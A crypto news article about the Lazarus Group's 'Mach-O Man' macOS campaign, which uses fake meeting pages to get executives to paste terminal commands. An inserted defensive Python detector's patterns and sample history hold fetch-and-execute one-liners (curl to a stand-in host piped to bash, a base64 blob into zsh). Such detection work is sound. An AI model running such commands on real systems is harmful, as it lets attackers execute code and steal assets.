COINTURK NEWS
Lazarus steals $500 million in new BTC heist

In Brief

  • 🚨 Lazarus Group stole $500 million in digital assets with Mach-O Man.

  • Attacks targeted executives in the Bitcoin, fintech, and DeFi sectors using advanced malware.

  • Critical data: Hackers exploited social engineering tactics that slipped past standard security.

Ömer Ergin

Lazarus Group, a cybercrime syndicate long associated with North Korea, is shifting its focus from traditional banking heists to major attacks on the cryptocurrency and fintech industries. Since 2017, analysts estimate Lazarus has been responsible for thefts totaling $6.7 billion. The group’s latest operation, dubbed “Mach-O Man,” is specifically targeting executives and businesses across digital finance, exploiting new vulnerabilities to access vast sums in digital assets.

Mach-O Man targets crypto and fintech leaders

Natalie Newson, a blockchain security expert at CertiK, has been closely monitoring Lazarus Group’s operations within crypto and fintech. In just the last two weeks, Lazarus stole upwards of $500 million in digital assets from platforms such as Drift and KelpDAO. Investigators stress that the Mach-O Man campaign is not an isolated incident but a coordinated mission backed and orchestrated at the state level by North Korea.

This sophisticated approach singles out both institutions and top executives in crypto and finance. Experts now see North Korea’s digital theft as a systemic, state-run revenue source. There is also growing concern among security professionals that variations of the Mach-O Man technique could be adopted by other criminal organizations worldwide.

How ClickFix social engineering exploits work

The hallmark of the Mach-O Man attack is its use of modular macOS malware, developed by Lazarus’s “Chollima” subunit and designed to compromise crypto and fintech applications on Apple systems. According to Newson, the malware is delivered through a targeted social engineering ploy known as “ClickFix.”

Attackers contact executives via Telegram, sending urgent meeting requests. Victims are then redirected to deceptively authentic sites mimicking known platforms like Zoom, Microsoft Teams, or Google Meet. They are told connection issues require them to paste a provided command into their terminal, unwittingly granting hackers direct access to corporate systems and financial assets.

Newson explains that “the page appears entirely legitimate, and the instructions seem routine—the victim initiates the action themselves, so conventional security checks rarely detect the attack.”
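Because the victim types the command themselves, one place a defender can still look is the shell's own record of what was run. The following is an added example, not code from the article or from CertiK: it scans plain or zsh extended-format history text for paste-and-run one-liners. The rule patterns, the assumption that history is being saved, and the sample lines (including the `example.invalid` hostnames and the placeholder blob) are constructed for illustration and are not indicators from this campaign.

```python
import re

# Constructed heuristics for this example; they are not indicators from the article.
SHELL = r"(?:sudo\s+)?(?:ba|z|da)?sh\b"
RULES = [
    ("download piped to shell",
     re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*" + SHELL)),
    ("decoded blob piped to shell",
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*" + SHELL)),
    ("shell executing a download inline",
     re.compile(r"\b(?:ba|z)?sh\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b")),
]
# zsh EXTENDED_HISTORY lines look like ": <epoch>:<duration>;<command>"
ZSH_EXT = re.compile(r"^: (\d+):\d+;(.*)$")

def parse_history(text):
    """Yield (epoch_or_None, command) from plain or zsh extended history lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ZSH_EXT.match(line)
        yield (int(m.group(1)), m.group(2)) if m else (None, line)

def flag_paste_and_run(text):
    """Return (epoch, rule_name, command) for each command matching a rule."""
    hits = []
    for ts, cmd in parse_history(text):
        for name, rx in RULES:
            if rx.search(cmd):
                hits.append((ts, name, cmd))
                break  # one finding per command is enough for triage
    return hits

# Constructed sample: three benign lines (including pipes to jq and shasum,
# which must not match) followed by three paste-and-run shapes.
SAMPLE_HISTORY = """\
: 1700000000:0;git pull --rebase
: 1700000100:0;curl -s https://api.example.com/status | jq .
: 1700000200:0;curl -s https://example.com/tool.tgz | shasum -a 256
: 1700000300:0;curl -fsSL https://meeting-fix.example.invalid/audio.sh | bash
: 1700000400:0;echo "<BASE64_PLACEHOLDER>" | base64 -D | zsh
/bin/zsh -c "$(curl -fsSL https://meeting-fix.example.invalid/repair)"
"""

if __name__ == "__main__":
    for ts, name, cmd in flag_paste_and_run(SAMPLE_HISTORY):
        print(ts, name, cmd, sep="\t")
```

A hit is a triage lead rather than a verdict, since some legitimate installers use the same shape; the timestamp lets an analyst line it up with the meeting invitation the user received.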

DeFi projects face heightened risks

Mach-O Man’s sophistication has raised alarm throughout the sector, posing serious threats to both organizations and individuals—particularly in the DeFi landscape. Security researcher Vladimir S. reports that attackers have even seized control of DeFi project domains, replacing original websites with fraudulent Cloudflare prompts that instruct users to execute malicious commands for “authentication.”

This tactic leverages convincing prompts so well that most users, including senior staff, comply without hesitation, inadvertently opening the door for total platform compromise. The malware is engineered to erase itself rapidly, leaving virtually no digital footprints and making forensic tracing extremely difficult.

Newson observes, “Most victims never realize they’ve been breached. Even if they do, it’s almost impossible to identify which variant infiltrated their systems.”

Specialists warn that Lazarus Group’s attacks are no longer episodic news items—they now represent a persistent, high-stakes threat to the entire crypto ecosystem. Those active within fintech and digital currency realms are urged to increase both technical and social vigilance to preempt future incursions.

Ömer Ergin, 22 April, 2026 - 4:34 pm